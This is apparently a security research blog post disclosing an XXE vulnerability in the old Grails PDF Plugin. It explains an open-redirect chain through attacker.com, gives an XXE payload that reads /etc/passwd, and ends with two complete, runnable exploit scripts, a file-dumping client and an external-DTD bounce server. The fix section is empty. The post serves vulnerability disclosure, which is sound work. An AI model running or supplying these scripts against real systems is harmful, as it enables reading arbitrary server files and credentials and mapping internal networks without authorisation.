Discovery
Some times ago the Ambionics team encountered a very old instance of Grails, a Groovy based MVC framework. This instance contained a plugin to generate PDFs from Groovy templates, and was quite simply named PDF Plugin. Upon looking for the plugin's source code, it appeared that it had not been maintained in the past 6 years, with a very last commit dating from August 3, 2011. Evidently, this caught our eye.
The plugin
Extract from the plugin's README:
Pdf plugin allows a Grails application to generate PDFs and send them
to the browser by converting existing pages in your application to PDF
on the fly. The underlying system uses the xhtmlrenderer component from java.net
along with iText to do the rendering.
Two important things can be noted:
- It converts existing pages of the application.
- It uses Flying Saucer to do the HTML to PDF conversion.
Upon further inspection, it also appeared that Flying Saucer, the Java library which converts HTML to PDF, has the following properties:
- It is able to fetch resource files, such as images, Cascading Style Sheets (CSS), etc.
- It is very specific about not accepting invalid HTML.
- It parses the HTML using the Java XML parser.
As always, when we see XML parsers, we think about its XXE capability. What if we could read files on the server?
The code
Here is the code of the main controller of the plugin, with comments of my own:
// The eponym method is called upon reaching the /pdf/pdfForm URL, and the
// params array is user-submitted GET/POST data
def pdfForm = {
try{
byte[] b
// Build a base URI, something like
// http://localhost:80/base_path/
def baseUri = request.scheme + "://" + request.serverName + ":" + request.serverPort + grailsAttributes.getApplicationUri(request)
// 1: If it is a GET call, append the url parameter to the base URI, fetch it via an HTTP request, and render it
// For instance, if we fetch http://target.com/pdf/pdfForm?url=/test.html, it will try to render http://localhost/test.html
if(request.method == "GET") {
def url = baseUri + params.url + '?' + request.getQueryString()
//println "BaseUri is $baseUri"
//println "Fetching url $url"
b = pdfService.buildPdf(url)
}
// 2: If it's a POST call, generate the HTML content from a controller and an action, and feed it to the generator
if(request.method == "POST"){
def content
if(params.template){
//println "Template: $params.template"
content = g.render(template:params.template, model:[pdf:params])
}
else{
content = g.include(controller:params.pdfController, action:params.pdfAction, id:params.id, pdf:params)
}
b = pdfService.buildPdfFromString(content.readAsString(), baseUri)
}
response.setContentType("application/pdf")
response.setHeader("Content-disposition", "attachment; filename=" + (params.filename ?: "document.pdf"))
response.setContentLength(b.length)
response.getOutputStream().write(b)
}
// In case of error, redirect to the url specified by the url parameter
catch (e) {
println "there was a problem with PDF generation ${e}"
if(params.template) render(template:params.template)
if(params.url) redirect(uri:params.url + '?' + request.getQueryString())
else redirect(controller:params.pdfController, action:params.pdfAction, params:params)
}
}
From the code, it appears that the PDF plugin has two ways of generating a PDF:
- From a local URL, it sends a GET request to the page, and renders it via pdfService.buildPdf
- From a given Groovy controller and action, it generates the HTML content, and feeds it to the PDF generator through pdfService.buildPdfFromString
As we do not control any Groovy template or controller on the server, we're not interested in the second option. The first one looks more promising: it issues an HTTP request to a local URI.
Step 1: Fetching our HTML page
Although it might be useful sometimes (for instance to bypass an IP filter or hitting an HTTP service in the internal network), making the module fetch a local URI for us, and return it as a PDF, is not of great help. What we want is complete control of the HTML page that was fed to the PDF renderer.
Luckily, the solution is in the same piece of code: the catch() call handles error by redirecting us to the URL of our choice (params.url), in case any exception happens during the PDF generation. Therefore, we have an open redirect: http://target.com/pdf/pdfForm?url=http://attacker.com/page.html
will redirect us to http://attacker.com/page.html
, because the code will try to send an HTTP query to http://target.com/http://attacker.com/page.html
, which will fail, throwing an exception.
Therefore, by issuing a GET request to: http://target.com/pdf/pdfForm?url=pdf/pdfForm?url=http://attacker.com/page.html
(note the duplication of the pdf/pdfForm?url= part)
This happens:
- The pdfForm method appends our URL parameter to the baseUri, and fetches it internally
- The server issues a GET request to http://localhost/pdf/pdfForm?url=http://attacker.com/page.html
- The server appends http://attacker.com/page.html to the baseUri
- The server issues a request to http://localhost/http://attacker.com/page.html
- The request fails (404)
- Since the request failed, an exception is thrown, resulting in a redirect to http://attacker.com/page.html
- Our first request results in http://attacker.com/page.html being rendered in PDF
Let us try it by rendering an Hello world:
GET /page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html?url=http://10.0.0.138/page.html?url=/pdf/pdfForm?url=http://10.0.0.138/page.html
We're now able to make the server render a page of our choice ! The first idea from this point was to use a file:// protocol instead of the standard http://; it did not work. It does not matter though, because this achievement widens our attack surface by a lot.
Step 2: Playing with the renderer
Now that we control our page, let's go ahead and verify Flying Saucer's promises.
For instance, let's ask it to render an image, with an <img src="image.jpg" />
tag:
Or some CSS:
Step 3: Exploitation
It's now time to try a simple XXE:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
<!ENTITY goodies SYSTEM "file:///etc/passwd">
]>
<html>
<body>
<!-- Since it's HTML after all, why not render our output nicely -->
<pre>&goodies;</pre>
</body>
</html>
Which yields:
Listing directories is also possible, via the same vector:
Using the CSS parsing capability of Flying Saucer and pdftotext we are able to completely automate the process.
The exploitation allowed us to fetch critical data from the server, and helped us map internal network.
Correction
Even if the plugin is not that recent, here are recommandations about how to fix it, without code-diving too much:
Exploit
dump_file.py
#!/usr/bin/python3
# Grails PDF Plugin XXE
# cf
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
import requests
import sys
import os
# Base URL of the Grails target
URL = 'http://10.0.0.179:8080/grailstest'
# "Bounce" HTTP Server
BOUNCE = 'http://10.0.0.138:7777/'
session = requests.Session()
pdfForm = '/pdf/pdfForm?url='
renderPage = 'render.html'
if len(sys.argv) < 0:
print('usage: ./%s <resource>' % sys.argv[0])
print('e.g.: ./%s file:///etc/passwd' % sys.argv[0])
exit(0)
resource = sys.argv[1]
# Build the full URL
full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage
full_url += '&resource=' + sys.argv[1]
r = requests.get(full_url, allow_redirects=False)
#print(full_url)
if r.status_code != 200:
print('Error: %s' % r)
else:
with open('/tmp/file.pdf', 'wb') as handle:
handle.write(r.content)
os.system('pdftotext /tmp/file.pdf')
with open('/tmp/file.txt', 'r') as handle:
print(handle.read(), end='')
server.py
#!/usr/bin/python3
# Grails PDF Plugin XXE
# cf
# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
#
# Server part of the exploitation
#
# Start it in an empty folder:
# $ mkdir /tmp/empty
# $ mv server.py /tmp/empty
# $ /tmp/empty/server.py
import http.server
import socketserver
import sys
BOUNCE_IP = '10.0.0.138'
BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80
# Template for the HTML page
template = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "[RESOURCE]">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://[BOUNCE]/out.dtd">
%dtd;
]>
<html>
<head>
<style>
body { font-size: 1px; width: 1000000000px;}
</style>
</head>
<body>
<pre>&all;</pre>
</body>
</html>"""
# The external DTD trick allows us to get more files; they would've been invalid
# otherwise
# See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
dtd = """<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
"""
# Really hacky. When the render.html page is requested, we extract the
# 'resource=XXX' part of the URL and create an HTML file which XXEs it.
class GetHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if 'render.html' in self.path:
resource = self.path.split('resource=')[1]
print('Resource: %s' % resource)
page = template
page = page.replace('[RESOURCE]', resource)
page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP, BOUNCE_PORT))
with open('render.html', 'w') as handle:
handle.write(page)
return super().do_GET()
Handler = GetHandler
httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler)
with open('out.dtd', 'w') as handle:
handle.write(dtd)
print("Started HTTP server on port %d, press Ctrl-C to exit..." % BOUNCE_PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("Keyboard interrupt received, exiting.")
httpd.server_close()